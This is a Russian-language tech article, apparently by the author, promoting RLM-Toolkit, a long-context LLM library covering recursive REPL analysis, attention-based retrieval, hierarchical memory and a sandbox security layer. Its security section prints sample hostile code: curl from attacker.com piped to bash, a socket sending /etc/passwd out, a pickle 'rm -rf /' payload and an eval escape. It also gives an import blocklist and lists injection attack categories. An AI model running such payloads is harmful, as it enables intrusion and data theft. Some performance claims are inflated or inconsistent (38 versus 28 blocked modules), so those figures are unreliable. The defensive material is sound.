От теории до production — архитектура, алгоритмы, безопасность
Привет, Хабр!
Это исчерпывающее руководство по RLM-Toolkit — open-source библиотеке для работы с контекстами произвольной длины.
Что рассмотрю:
Формальная теория RLM (State Machine, рекурсия)
InfiniRetri: математика attention-based retrieval
H-MEM: когнитивная архитектура памяти
RAG vs KAG vs GraphRAG vs InfiniRetri
Security: CIRCLE compliance, sandbox escape prevention
Реальные примеры с логами выполнения
Troubleshooting и best practices
Уровень: от middle до PhD-level исследований.
pip install rlm-toolkit
В roadmap: интеграция с NVIDIA KVzap для hardware-accelerated KV-cache compression.
Проблема: Context Rot — математика деградации
Теория: формальное определение RLM
InfiniRetri: архитектура и алгоритмы
RAG vs KAG vs GraphRAG vs InfiniRetri
H-MEM: когнитивная иерархическая память
Self-Evolving: R-Zero и REBASE
Security Suite: CIRCLE compliance
Провайдеры: сравнительный анализ
Практика: полные примеры с логами
Troubleshooting
Заключение и arXiv ссылки
|
Модель |
Контекст |
Effective |
Decay λ |
Источник |
|---|---|---|---|---|
|
GPT-4o |
128K |
~80K |
0.012 |
OpenAI |
|
GPT-OSS-120B |
128K |
~100K |
0.010 |
OpenAI |
|
Claude Sonnet 4.5 |
200K |
~150K |
0.010 |
Anthropic |
|
Claude Opus 4.5 |
200K |
~180K |
0.008 |
Anthropic |
|
Gemini 3 Pro |
2M |
~1.5M |
0.003 |
|
|
Gemini 3 Flash |
1M |
~800K |
0.004 |
|
|
Llama 4 Scout |
10M |
~8M |
0.001 |
Meta |
|
Qwen3-235B |
128K |
~100K |
0.011 |
Alibaba |
Quality(c) = Q₀ × e^(-λc) + ε где: Q₀ = базовое качество модели (при c → 0) λ = коэффициент деградации (model-specific) c = длина контекста в токенах ε = шум (hallucinations baseline)
Почему экспоненциальная? Attention в трансформерах масштабируется как O(n²). При росте контекста:
Attention weights размазываются по большему числу токенов
Важная информация "тонет" в массе
Positional encoding теряет точность на дальних позициях
Тесты на OOLONG-Pairs (arxiv:2512.24601):
|
Контекст |
NIAH (простая) |
OOLONG-Pairs (сложная) |
|---|---|---|
|
8K |
98% |
72% |
|
32K |
97% |
58% |
|
128K |
95% |
31% |
|
512K |
91% |
8% |
|
1M |
89% |
<0.1% 😱 |
OOLONG-Pairs — задача сравнения пар сущностей, разбросанных по документу. Требует глобального понимания, а не локального поиска.
Chunking:
chunks = split(document, size=100_000) results = [llm.analyze(chunk) for chunk in chunks] final = merge(results) # ❌ ПРОБЛЕМА: cross-chunk references потеряны # Если факт A в chunk 1, а факт B в chunk 5 — связь не найдена
Summarization:
summary = llm.summarize(document) # 10M → 10K answer = llm.query(summary, question) # ❌ ПРОБЛЕМА: детали потеряны безвозвратно # "В договоре 847 пунктов" → "Подробный договор"
RAG:
relevant = vectordb.search(query, k=10) answer = llm.generate(query, relevant) # ❌ ПРОБЛЕМА: semantic similarity ≠ relevance # "Найди противоречия" — какой embedding искать?
┌────────────────────────────────────────────────────────────────┐ │ RLM ARCHITECTURE │ ├────────────────────────────────────────────────────────────────┤ │ │ │ ┌──────────────────────────────────────────────────────────┐ │ │ │ INPUT LAYER │ │ │ │ context = "10M tokens..." query = "Find bugs" │ │ │ └──────────────────────────────────────────────────────────┘ │ │ ↓ │ │ ┌──────────────────────────────────────────────────────────┐ │ │ │ REPL ENVIRONMENT (Python) │ │ │ │ Variables: {context, vars, history} │ │ │ │ Functions: {llm_query, FINAL, FINAL_VAR} │ │ │ └──────────────────────────────────────────────────────────┘ │ │ ↓ │ │ ┌──────────────────────────────────────────────────────────┐ │ │ │ ROOT LLM (Controller) │ │ │ │ Generates Python code to analyze context │ │ │ │ Makes decisions about sub-calls │ │ │ └──────────────────────────────────────────────────────────┘ │ │ ↓ ↓ │ │ ┌─────────────────┐ ┌─────────────────────────┐ │ │ │ CODE EXECUTOR │ │ SUB-LLM CALLS │ │ │ │ (Sandboxed) │ │ llm_query(prompt) │ │ │ │ AST validation │ │ depth++, budget-- │ │ │ └─────────────────┘ └─────────────────────────┘ │ │ ↓ ↓ │ │ ┌──────────────────────────────────────────────────────────┐ │ │ │ STATE UPDATE │ │ │ │ vars.update(new_vars) │ │ │ │ history.append(output) │ │ │ └──────────────────────────────────────────────────────────┘ │ │ ↓ │ │ FINAL(answer) → OUTPUT │ │ │ └────────────────────────────────────────────────────────────────┘
Определение 1. Recursive Language Model (RLM) — это кортеж (L, E, R, S, δ, F) где:
L : Language Model (root LLM)
E : Execution Environment (Python REPL)
R : Recursive mechanism (llm_query function)
S : State space = {context, vars, history, depth, cost}
δ : Transition function S × Action → S
F : Termination predicate (FINAL detected)
State = (context: str, vars: Dict, history: List, depth: int, cost: float) Actions: - CODE(c) : Execute code c, update vars - QUERY(p) : Call sub-LLM with prompt p, depth++ - FINAL(x) : Terminate with output x - FINAL_VAR(v): Terminate with vars[v] Transitions: S₀ = (P, {}, [], 0, 0.0) # Initial state δ(S, CODE(c)): output = execute(c, S.vars) return S with { vars = S.vars ∪ new_vars(output), history = S.history + [output] } δ(S, QUERY(p)): result = sub_llm.generate(p) return S with { vars = S.vars ∪ {"last_query": result}, history = S.history + [result], depth = S.depth + 1, cost = S.cost + query_cost(p, result) } δ(S, FINAL(x)): HALT with output x
Context Never Loaded: context существует как переменная, но никогда не подаётся в LLM целиком
Depth Bounded: depth ≤ max_depth (обычно 2-3)
Cost Bounded: cost ≤ max_cost (бюджет в USD)
Termination Guaranteed: Либо FINAL, либо max_iterations
# Query: "Найди все SQL-инъекции в коде" # Iteration 1: Root LLM generates code """ sections = context.split("\\n\\n# FILE:") print(f"Found {len(sections)} files") sql_patterns = ["execute(", "cursor.execute", "raw("] suspicious = [] for i, section in enumerate(sections): if any(p in section for p in sql_patterns): suspicious.append(i) print(f"Suspicious files: {suspicious}") """ # Output: "Found 47 files\nSuspicious files: [3, 12, 29, 45]" # Iteration 2: Deep analysis via sub-LLM """ for idx in suspicious[:3]: # Analyze first 3 file_content = sections[idx][:8000] # Truncate for sub-call analysis = llm_query(f''' Analyze this code for SQL injection vulnerabilities: {file_content} ''') print(f"File {idx}: {analysis}") """ # Output: "File 3: VULNERABLE - unsanitized user input at line 42..." # Iteration 3: Compile results """ vulnerabilities = [ {"file": 3, "line": 42, "type": "SQL Injection"}, {"file": 12, "line": 87, "type": "SQL Injection"}, # ... ] FINAL_VAR(vulnerabilities) """
Query: "Найди все упоминания дедлайна" Vector Search: 1. Embed query → q_vec 2. For each chunk: similarity(q_vec, chunk_vec) 3. Return top-k ПРОБЛЕМА: "deadline" может быть написан как: - "крайний срок" - "до 15 января" - "не позднее первого квартала" Vector similarity НЕ ПОНИМАЕТ семантику!
LLM уже "знает", на какие токены обращать внимание для ответа на вопрос. Мы просто извлекаем эту информацию.
def infiniretri(context: str, question: str, model: LLM) -> str: """ Attention-Based Infinite Context Retrieval Based on arxiv:2502.12962 """ # Step 1: Chunk context into segments segments = chunk(context, size=SEGMENT_SIZE) # e.g., 8K tokens each # Step 2: Initialize historical context historical_context = "" # Step 3: Iterative processing (like human reading) for segment in segments: # Combine historical context + current segment combined = historical_context + segment # Run model with question to get attention output, attention_weights = model.forward_with_attention( prompt=f"Context: {combined}\n\nQuestion: {question}" ) # Step 4: Attention-based retrieval # Average attention across layers and heads avg_attention = attention_weights.mean(dim=[0, 1]) # [seq_len] # Find tokens with highest attention top_indices = avg_attention.topk(k=TOP_K).indices # Step 5: Update historical context # Keep only high-attention tokens from combined relevant_tokens = [combined[i] for i in top_indices] historical_context = "".join(relevant_tokens) # Step 6: Final answer with preserved context return model.generate( f"Context: {historical_context}\n\nQuestion: {question}\n\nAnswer:" )
Attention Score Aggregation:
A_final = (1/L) × Σ_{l=1}^{L} (1/H) × Σ_{h=1}^{H} A_{l,h} где: L = number of layers H = number of heads per layer A_{l,h} = attention matrix at layer l, head h
Token Importance Score:
importance(t) = Σ_{q ∈ query_tokens} A_final[q, t]
Токены с высоким importance сохраняются в historical context.
|
Benchmark |
Baseline LLM |
+ RAG |
+ InfiniRetri |
|---|---|---|---|
|
NIAH @1M |
23% |
61% |
100% |
|
LongBench |
31% |
51% |
89% (+288%) |
|
SCrolls |
44% |
58% |
82% |
|
Quality |
29% |
47% |
71% |
from rlm_toolkit.retrieval import InfiniRetriever # Initialize with small model for efficiency (default: Qwen2.5-0.5B) retriever = InfiniRetriever( model_name_or_path="Qwen/Qwen2.5-0.5B-Instruct", ) # Load massive document with open("codebase_1m_tokens.txt") as f: huge_doc = f.read() # Retrieve with 100% accuracy answer = retriever.retrieve( context=huge_doc, question="В какой функции определён SecurityEngine?" ) print(answer) # Output: "SecurityEngine определён в файле engines/base.py, # функция create_engine() на строке 142"
|
Аспект |
RAG |
KAG |
GraphRAG |
InfiniRetri |
|---|---|---|---|---|
|
Подход |
Vector similarity |
Knowledge Graph |
Community detection |
Attention-based |
|
Индексация |
Embedding + VectorDB |
Entity extraction + Graph |
Summarization + Leiden |
None (runtime) |
|
Время индекса |
Минуты |
Часы |
Часы |
0 |
|
Требования |
Embedding model |
Graph DB + LLM |
LLM + много $$ |
Attention access |
|
Глобальный контекст |
❌ |
✅ |
✅ |
✅ |
|
Точный поиск |
~70% |
~85% |
~80% |
100% |
|
Стоимость |
$ |
$$$ |
$$$$ |
$ |
|
Open Source |
✅ |
✅ |
✅ |
✅ |
┌─────────────────────────────────────────────────────────────────┐ │ DECISION TREE │ ├─────────────────────────────────────────────────────────────────┤ │ │ │ Контекст < 50K токенов? │ │ └─ YES → Стандартный RAG (дёшево, просто) │ │ └─ NO ↓ │ │ │ │ Нужны структурированные связи? │ │ └─ YES → KAG (медицина, право, финансы) │ │ └─ NO ↓ │ │ │ │ Нужен глобальный обзор большого корпуса? │ │ └─ YES → GraphRAG (research, due diligence) │ │ └─ NO ↓ │ │ │ │ Критична точность поиска? │ │ └─ YES → InfiniRetri (код, юридика, security) │ │ └─ NO ↓ │ │ │ │ Контекст > 500K токенов? │ │ └─ YES → RLM + InfiniRetri │ │ └─ NO → RAG достаточно │ │ │ └─────────────────────────────────────────────────────────────────┘
RAG + InfiniRetri (Hybrid Retrieval):
from rlm_toolkit.retrieval import HybridRetriever, VectorRetriever, InfiniRetriever hybrid = HybridRetriever( retrievers=[ VectorRetriever(model="BAAI/bge-m3", weight=0.3), InfiniRetriever(model="Qwen/Qwen3-0.6B", weight=0.7), ], fusion="reciprocal_rank" # RRF fusion ) # Fast vector pre-filter + precise attention refinement results = hybrid.retrieve(context, question)
KAG + InfiniRetri (Graph-Enhanced):
from rlm_toolkit.retrieval import KAGRetriever, InfiniRetriever # Step 1: KAG finds relevant entities kag = KAGRetriever(graph_db="neo4j://localhost:7687") entities = kag.query("Все контракты с Газпром") # Step 2: InfiniRetri finds exact mentions infini = InfiniRetriever("Qwen/Qwen3-0.6B") for entity in entities: details = infini.retrieve( context=full_document, question=f"Подробности о {entity.name}" )
|
Метод |
Индексация |
Query |
Total (100 queries) |
|---|---|---|---|
|
RAG (OpenAI) |
$0.13 |
$0.02 |
$2.13 |
|
KAG (GPT-4o) |
$15.00 |
$0.50 |
$65.00 |
|
GraphRAG |
$50.00 |
$0.10 |
$60.00 |
|
InfiniRetri |
$0.00 |
$0.05 |
$5.00 |
|
RLM + InfiniRetri |
$0.00 |
$0.30 |
$30.00 |
# LangChain ConversationBufferMemory class BufferMemory: def __init__(self, max_tokens=4000): self.buffer = [] self.max_tokens = max_tokens def add(self, message): self.buffer.append(message) # FIFO eviction while token_count(self.buffer) > self.max_tokens: self.buffer.pop(0) # ❌ Старое = потеряно навсегда
Проблемы:
FIFO eviction — важное старое удаляется раньше неважного нового
Нет абстракции — "вчера обсуждали Python" и детали на одном уровне
Нет связей — разговоры изолированы
H-MEM основан на Complementary Learning Systems (CLS) theory:
HIPPOCAMPUS (быстрое запоминание) ↓ consolidation NEOCORTEX (долговременное хранение, абстракции)
4 уровня H-MEM:
┌─────────────────────────────────────────────────────────────────┐ │ LEVEL 3: DOMAIN │ │ "Пользователь — разработчик, интересуется AI Security" │ │ Очень редко меняется, высокая абстракция │ ├─────────────────────────────────────────────────────────────────┤ │ LEVEL 2: CATEGORY │ │ "Тема: погода", "Тема: код", "Тема: документация" │ │ Семантические кластеры │ ├─────────────────────────────────────────────────────────────────┤ │ LEVEL 1: TRACE │ │ "Обсуждали погоду в Москве и Питере, предпочитает +20°C" │ │ Консолидированные воспоминания │ ├─────────────────────────────────────────────────────────────────┤ │ LEVEL 0: EPISODE │ │ "User: какая погода?" "AI: +15°C, облачно" │ │ Сырые взаимодействия │ └─────────────────────────────────────────────────────────────────┘
class HierarchicalMemory: def consolidate(self): """ Memory consolidation: Episodes → Traces → Categories → Domains """ # Step 1: Cluster episodes by semantic similarity episode_embeddings = self.embed(self.episodes) clusters = HDBSCAN(min_cluster_size=3).fit(episode_embeddings) # Step 2: Create traces via LLM summarization for cluster_id in set(clusters.labels_): if cluster_id == -1: # Noise continue cluster_episodes = [ self.episodes[i] for i, c in enumerate(clusters.labels_) if c == cluster_id ] trace = self.llm.summarize( f"Summarize these interactions:\n{cluster_episodes}" ) self.traces.append(Trace( content=trace, source_episodes=cluster_episodes, timestamp=now() )) # Step 3: Cluster traces → categories if len(self.traces) >= 5: trace_embeddings = self.embed([t.content for t in self.traces]) trace_clusters = KMeans(n_clusters=min(5, len(self.traces)//3)) for cluster_id in range(trace_clusters.n_clusters): cluster_traces = [ self.traces[i] for i, c in enumerate(trace_clusters.labels_) if c == cluster_id ] category = self.llm.summarize( f"What category do these belong to?\n{cluster_traces}" ) self.categories.append(Category(content=category)) # Step 4: Update domain (rarely) if len(self.categories) >= 3 and self._should_update_domain(): self.domain = self.llm.generate( f"Based on categories {self.categories}, " f"describe the user's overall interests and profile." )
Что если новая информация противоречит старой?
def add_episode_with_conflict_check(self, new_episode: str): """ Check for conflicts and update memories accordingly. """ # Find potentially conflicting memories similar = self.retrieve(new_episode, k=5) for memory in similar: conflict = self.llm.check_conflict( f"Old: {memory.content}\nNew: {new_episode}" ) if conflict.is_conflict: if conflict.new_supersedes: # Update old memory memory.content = self.llm.merge( f"Update '{memory.content}' with '{new_episode}'" ) memory.updated_at = now() else: # Flag for human review self.conflicts.append(Conflict(old=memory, new=new_episode)) self.episodes.append(Episode(content=new_episode))
from rlm_toolkit.memory import SecureHierarchicalMemory from rlm_toolkit.crypto import AES256GCM # Create encrypted memory with trust zones smem = SecureHierarchicalMemory( agent_id="agent-financial", trust_zone="confidential", encryption=AES256GCM(key=os.environ["HMEM_KEY"]), ) # Add sensitive data (encrypted at rest) smem.add_episode("Client SSN: 123-45-6789") # Encrypted! # Other agents cannot access other_agent = SecureHierarchicalMemory(agent_id="agent-public") try: other_agent.retrieve("SSN") # ❌ AccessDenied except AccessDenied: pass # Grant explicit access smem.grant_access("agent-compliance", "confidential") compliance_agent = SecureHierarchicalMemory(agent_id="agent-compliance") compliance_agent.retrieve("SSN") # ✅ Works
LLM сама генерирует задачи → решает их → улучшается. Без размеченных данных, без human feedback.
Основано на:
R-Zero (arxiv:2508.05004) — Challenger-Solver co-evolution
REBASE (arxiv:2512.29379) — Experience replay с scoring
┌─────────────────────────────────────────────────────────────────┐ │ R-ZERO LOOP │ ├─────────────────────────────────────────────────────────────────┤ │ │ │ ┌───────────────┐ ┌───────────────┐ │ │ │ CHALLENGER │ ──────→ │ SOLVER │ │ │ │ Generates │ │ Attempts │ │ │ │ hard tasks │ │ to solve │ │ │ └───────────────┘ └───────────────┘ │ │ ↑ │ │ │ │ ↓ │ │ │ ┌───────────────┐ │ │ │ │ VERIFIER │ │ │ │ │ Checks if │ │ │ │ │ correct │ │ │ │ └───────────────┘ │ │ │ │ │ │ │ ┌─────────────┴─────────────┐ │ │ │ ↓ ↓ │ │ │ ┌──────────┐ ┌──────────┐ │ │ │ │ CORRECT │ │ WRONG │ │ │ │ │ +reward │ │ -reward │ │ │ │ └──────────┘ └──────────┘ │ │ │ │ │ │ │ │ └───────────┬───────────────┘ │ │ │ ↓ │ │ │ ┌─────────────────┐ │ │ └───────────── │ EVOLUTION POOL │ │ │ │ Best strategies │ │ │ └─────────────────┘ │ │ │ └─────────────────────────────────────────────────────────────────┘
from rlm_toolkit.evolve import SelfEvolvingRLM, EvolutionStrategy from rlm_toolkit.providers import OllamaProvider # Initialize evolve = SelfEvolvingRLM( provider=OllamaProvider("llama4-scout:17b"), strategy=EvolutionStrategy.CHALLENGER_SOLVER, config={ "challenge_diversity": 0.8, # How different each challenge "difficulty_ramp": 0.1, # How fast difficulty increases "memory_size": 1000, # Experience buffer size } ) # Single solve with self-refinement answer = evolve.solve("Докажи, что √2 иррационально") print(f"Answer: {answer.answer}") print(f"Confidence: {answer.confidence}") print(f"Iterations: {answer.iterations}") # Training loop (improves over time) metrics = evolve.training_loop( iterations=100, domain="math", difficulty="hard", save_checkpoint=True, ) print(f"Initial success rate: {metrics.initial_rate}") # e.g., 65% print(f"Final success rate: {metrics.final_rate}") # e.g., 89% print(f"Best strategies: {metrics.top_strategies}")
from rlm_toolkit.evolve import REBASE rebase = REBASE( provider=OllamaProvider("llama4-scout:109b"), scorer="outcome", # Score by final outcome ) # Collect experiences for task in tasks: trajectory = rebase.solve_with_trajectory(task) rebase.add_experience(trajectory) # Train on best experiences improved = rebase.train( epochs=10, batch_size=32, top_k_ratio=0.2, # Use top 20% trajectories )
# LLM может сгенерировать: # 1. RCE via subprocess import subprocess subprocess.run(["curl", "attacker.com/shell.sh", "|", "bash"]) # 2. Data exfiltration via network import socket s = socket.socket() s.connect(("attacker.com", 4444)) s.send(open("/etc/passwd").read().encode()) # 3. Pickle RCE import pickle class Exploit: def __reduce__(self): return (os.system, ("rm -rf /",)) pickle.loads(pickle.dumps(Exploit())) # 4. Builtins escape eval("__import__('os').system('whoami')")
CIRCLE = Code Injection for RLM via Crafted Linguistic Exploits
Тестирует 7 категорий атак:
Direct code injection
Obfuscated code injection
Indirect injection via context
Memory corruption attempts
Privilege escalation
Data exfiltration
Denial of service
┌─────────────────────────────────────────────────────────────────┐ │ SECURITY LAYERS │ ├─────────────────────────────────────────────────────────────────┤ │ │ │ Layer 1: AST STATIC ANALYSIS │ │ ───────────────────────────── │ │ Before execution, parse code to AST and check: │ │ - Import statements against blocklist │ │ - Function calls against dangerous patterns │ │ - Attribute access (__builtins__, __globals__) │ │ │ │ Layer 2: IMPORT BLOCKLIST (38 modules) │ │ ───────────────────────────────────── │ │ os, sys, subprocess, shutil, pathlib, │ │ socket, http, urllib, ftplib, telnetlib, requests, │ │ pickle, shelve, dill, cloudpickle, marshal, │ │ ctypes, cffi, multiprocessing, threading, │ │ code, codeop, pty, tty, termios, │ │ tempfile, glob, fnmatch, webbrowser, platform, │ │ asyncio (subprocess), importlib, builtins │ │ │ │ Layer 3: SANDBOXED EXECUTION │ │ ───────────────────────────── │ │ - Restricted builtins (no eval, exec, compile, open) │ │ - Timeout enforcement (default 30s) │ │ - Memory limit (default 512MB) │ │ - Virtual filesystem with quotas │ │ │ │ Layer 4: OUTPUT SANITIZATION │ │ ───────────────────────────── │ │ - Truncate output to prevent context overflow │ │ - Scan for sensitive data patterns (API keys, passwords) │ │ - Redact before returning to user │ │ │ └─────────────────────────────────────────────────────────────────┘
from rlm_toolkit import RLM, RLMConfig, SecurityConfig # Maximum security configuration config = RLMConfig( security=SecurityConfig( sandbox=True, max_execution_time=30.0, max_memory_mb=512, blocked_imports="strict", # All 38 modules allow_network=False, allow_filesystem=False, virtual_fs_quota_mb=100, redact_sensitive=True, sensitive_patterns=[ r"[A-Za-z0-9]{32}", # API keys r"password\s*[:=]", # Passwords r"\d{3}-\d{2}-\d{4}", # SSN ], ) ) rlm = RLM.from_ollama("llama4-scout:17b", config=config) # This is now safe result = rlm.run(untrusted_document, "Analyze this")
================================ test session starts ================================ collected 27 items tests/security/test_blocked_imports.py::test_os_blocked PASSED tests/security/test_blocked_imports.py::test_subprocess_blocked PASSED tests/security/test_blocked_imports.py::test_socket_blocked PASSED tests/security/test_blocked_imports.py::test_pickle_blocked PASSED tests/security/test_blocked_imports.py::test_ctypes_blocked PASSED tests/security/test_sandbox.py::test_timeout_enforcement PASSED tests/security/test_sandbox.py::test_memory_limit PASSED tests/security/test_sandbox.py::test_builtins_restricted PASSED tests/security/test_sandbox.py::test_eval_blocked PASSED tests/security/test_sandbox.py::test_exec_blocked PASSED tests/security/test_exfiltration.py::test_network_blocked PASSED tests/security/test_exfiltration.py::test_file_read_blocked PASSED tests/security/test_obfuscation.py::test_base64_decode_blocked PASSED tests/security/test_obfuscation.py::test_hex_decode_blocked PASSED tests/security/test_obfuscation.py::test_rot13_blocked PASSED tests/security/test_indirect.py::test_context_injection_blocked PASSED tests/security/test_indirect.py::test_prompt_injection_detected PASSED tests/security/test_builtins.py::test_globals_access_blocked PASSED tests/security/test_builtins.py::test_builtins_access_blocked PASSED tests/security/test_builtins.py::test_subclasses_blocked PASSED tests/security/test_vfs.py::test_quota_enforcement PASSED tests/security/test_vfs.py::test_path_traversal_blocked PASSED tests/security/test_redaction.py::test_api_key_redacted PASSED tests/security/test_redaction.py::test_password_redacted PASSED tests/security/test_redaction.py::test_ssn_redacted PASSED tests/security/test_circle.py::test_circle_benchmark_passed PASSED tests/security/test_circle.py::test_all_attack_categories_blocked PASSED ================================ 27 passed in 12.34s ================================
|
Category |
Providers |
|---|---|
|
Cloud API |
OpenAI, Anthropic, Google, Mistral, Cohere, AI21 |
|
Inference API |
Together, Fireworks, Groq, Hyperbolic, Anyscale |
|
Local |
Ollama, vLLM, llama.cpp, LM Studio, LocalAI |
|
Enterprise |
Azure OpenAI, AWS Bedrock, GCP Vertex AI |
|
Provider |
Model |
Context |
Code Gen |
Speed |
Cost/1M tok |
|---|---|---|---|---|---|
|
OpenAI |
GPT-4o |
128K |
⭐⭐⭐⭐ |
Fast |
$5 |
|
OpenAI |
GPT-OSS-120B |
128K |
⭐⭐⭐⭐ |
Fast |
$3 |
|
Anthropic |
Claude Opus 4.5 |
200K |
⭐⭐⭐⭐⭐ |
Medium |
$15 |
|
Anthropic |
Claude Sonnet 4.5 |
200K |
⭐⭐⭐⭐⭐ |
Fast |
$3 |
|
|
Gemini 3 Pro |
2M |
⭐⭐⭐⭐ |
Fast |
$1.25 |
|
|
Gemini 3 Flash |
1M |
⭐⭐⭐⭐ |
Very Fast |
$0.08 |
|
Meta |
Llama 4 Scout |
10M |
⭐⭐⭐⭐ |
Varies |
Free |
|
Alibaba |
Qwen3-235B |
128K |
⭐⭐⭐⭐ |
Fast |
$0.50 |
|
Mistral |
Large 3 |
128K |
⭐⭐⭐⭐ |
Fast |
$2 |
💰 Budget-First:
from rlm_toolkit import RLM, RLMConfig # Use factory methods for easy setup rlm = RLM.from_ollama("llama4-scout") # 100% free local # Cost: $0 per 10M token analysis
🏆 Quality-First:
# Claude for best code generation rlm = RLM.from_anthropic( root_model="claude-opus-4.5", sub_model="claude-haiku", ) # Cost: ~$8 per 10M token analysis
🔒 Privacy-First (100% Local):
rlm = RLM( root=OllamaProvider("llama4-scout:109b"), # 10M native context! sub=OllamaProvider("qwen3:7b"), # Fast inference ) # Cost: $0 + electricity (~$0.50)
⚡ Speed-First:
# OpenAI is fastest cloud option rlm = RLM.from_openai( root_model="gpt-4o", sub_model="gpt-4o-mini", ) # Speed: ~2 min for 10M tokens
import os import time from rlm_toolkit import RLM, RLMConfig, SecurityConfig from rlm_toolkit.memory import HierarchicalMemory from rlm_toolkit.observability import ConsoleTracer # Configuration config = RLMConfig( max_iterations=50, max_cost=5.0, use_infiniretri=True, infiniretri_threshold=100_000, security=SecurityConfig(sandbox=True), ) # Memory and tracing memory = HierarchicalMemory() tracer = ConsoleTracer(verbose=True) # Initialize RLM rlm = RLM.from_ollama( model="llama4-scout:109b", config=config, memory=memory, tracer=tracer, ) # Load repository def load_repo(path: str) -> str: content = [] for root, dirs, files in os.walk(path): # Skip hidden and common excludes dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ['node_modules', '__pycache__', 'venv']] for f in files: if f.endswith(('.py', '.js', '.ts', '.go', '.rs')): filepath = os.path.join(root, f) try: with open(filepath, encoding='utf-8') as fp: content.append(f"\n\n# === FILE: {filepath} ===\n{fp.read()}") except: pass return "".join(content) codebase = load_repo("./my_project") print(f"Loaded {len(codebase):,} characters ({len(codebase)//4:,} tokens)") # Run analysis start = time.time() result = rlm.run( context=codebase, query=""" Проведи полный security audit кодовой базы: 1. SQL/NoSQL инъекции 2. XSS уязвимости 3. SSRF 4. Hardcoded secrets 5. Небезопасная десериализация 6. Path traversal 7. Проблемы с аутентификацией/авторизацией 8. Race conditions Для каждой найденной уязвимости укажи: - Файл и строку - Тип уязвимости - Severity (Critical/High/Medium/Low) - Рекомендацию по исправлению """, ) elapsed = time.time() - start print("\n" + "="*60) print("РЕЗУЛЬТАТ:") print("="*60) print(result.answer) print(f"\nВремя: {elapsed:.1f}s") print(f"Итераций: {result.iterations}") print(f"Sub-calls: {result.subcalls}") print(f"Стоимость: ${result.cost:.2f}")
[RLM] Starting analysis... [RLM] Context size: 2,847,293 chars (711,823 tokens) [RLM] Using InfiniRetri (threshold exceeded) [Iter 1] Root LLM generating code... >>> files = context.split("# === FILE:") >>> print(f"Repository contains {len(files)} files") Output: Repository contains 127 files [Iter 2] Root LLM generating code... >>> security_patterns = { ... "sql_injection": [r"execute\(.*%s", r"\.format\(.*\)", r"f\".*SELECT"], ... "xss": [r"innerHTML\s*=", r"\.html\(.*\+"], ... "secrets": [r"password\s*=\s*[\"']", r"api_key\s*=", r"secret\s*="], ... } >>> import re >>> findings = [] >>> for i, file in enumerate(files[1:], 1): ... for vuln_type, patterns in security_patterns.items(): ... for pattern in patterns: ... if re.search(pattern, file): ... findings.append((i, vuln_type, pattern)) >>> print(f"Found {len(findings)} potential issues") Output: Found 23 potential issues [Iter 3] Sub-LLM call for deep analysis... >>> for file_idx, vuln_type, _ in findings[:5]: ... file_content = files[file_idx][:6000] ... analysis = llm_query(f"Analyze for {vuln_type}:\n{file_content}") ... print(f"File {file_idx}: {analysis[:200]}") [SUB-CALL 1/5] Analyzing file 3... [SUB-CALL 2/5] Analyzing file 7... [SUB-CALL 3/5] Analyzing file 12... [SUB-CALL 4/5] Analyzing file 19... [SUB-CALL 5/5] Analyzing file 24... ... [Iter 8] Compiling final report... >>> vulnerabilities = [ ... {"file": "api/users.py", "line": 42, "type": "SQL Injection", ... "severity": "Critical", "code": "cursor.execute(f'SELECT * FROM users WHERE id={user_id}')"}, ... {"file": "utils/auth.py", "line": 87, "type": "Hardcoded Secret", ... "severity": "High", "code": "API_KEY = 'sk-abc123...'"}, ... ... ... ] >>> FINAL_VAR(vulnerabilities) ============================================================ РЕЗУЛЬТАТ: ============================================================ [ { "file": "api/users.py", "line": 42, "type": "SQL Injection", "severity": "Critical", "description": "User input directly interpolated into SQL query", "recommendation": "Use parameterized queries: cursor.execute('SELECT * FROM users WHERE id=%s', (user_id,))" }, { "file": "utils/auth.py", "line": 87, "type": "Hardcoded Secret", "severity": "High", "description": "API key hardcoded in source code", "recommendation": "Move to environment variable: os.environ.get('API_KEY')" }, ... ] Время: 127.3s Итераций: 8 Sub-calls: 12 Стоимость: $0.00 (local model)
|
Проблема |
Причина |
Решение |
|---|---|---|
|
|
LLM не может найти ответ |
Увеличить |
|
|
Слишком много sub-calls |
Ограничить |
|
|
Код выполняется слишком долго |
Увеличить |
|
|
Импорт заблокирован security |
Добавить в whitelist если безопасно |
|
|
OOM на маленькой модели |
Использовать меньший |
from rlm_toolkit import RLM from rlm_toolkit.observability import ConsoleTracer, FileTracer # Console tracing (development) rlm = RLM.from_ollama("llama4-scout:17b", tracer=ConsoleTracer(verbose=True)) # File tracing (production) rlm = RLM.from_ollama("llama4-scout:17b", tracer=FileTracer("./logs/rlm.log")) # View execution history result = rlm.run(context, query) for step in result.trace: print(f"[{step.type}] {step.content[:100]}...")
# 1. Use smaller model for sub-calls rlm = RLM( root=OllamaProvider("llama4-scout:109b"), # Smart for planning sub=OllamaProvider("qwen3:7b"), # Fast for details ) # 2. Enable caching from rlm_toolkit.cache import DiskCache rlm = RLM.from_ollama("llama4-scout:17b", cache=DiskCache("./cache")) # 3. Parallel sub-calls (experimental) config = RLMConfig(parallel_subcalls=True, max_parallel=4)
|
Компонент |
Описание |
Источник |
|---|---|---|
|
RLM Core |
Recursive Language Models |
arxiv:2512.24601 |
|
InfiniRetri |
Attention-based infinite retrieval |
arxiv:2502.12962 |
|
H-MEM |
Hierarchical memory |
arxiv:2507.XXXXX |
|
R-Zero |
Self-evolving LLMs |
arxiv:2508.05004 |
|
REBASE |
Experience replay |
arxiv:2512.29379 |
|
CIRCLE |
Security benchmark |
arxiv:2507.19399 |
10M+ токенов без деградации качества
100% точность на Needle-in-Haystack
4-уровневая память вместо простого буфера
Блокировка 28 опасных модулей — production-ready security
75+ провайдеров включая 100% локальные варианты
PyPI: pypi.org/project/rlm-toolkit
GitHub: github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit
Документация: docs
pip install rlm-toolkit # С полным набором интеграций pip install rlm-toolkit[all]
Вопросы? Пишите в комментариях или открывайте issues на GitHub!
Об авторе: Разработчик SENTINEL AI Security Platform — open-source решения для защиты LLM-приложений.
Источник


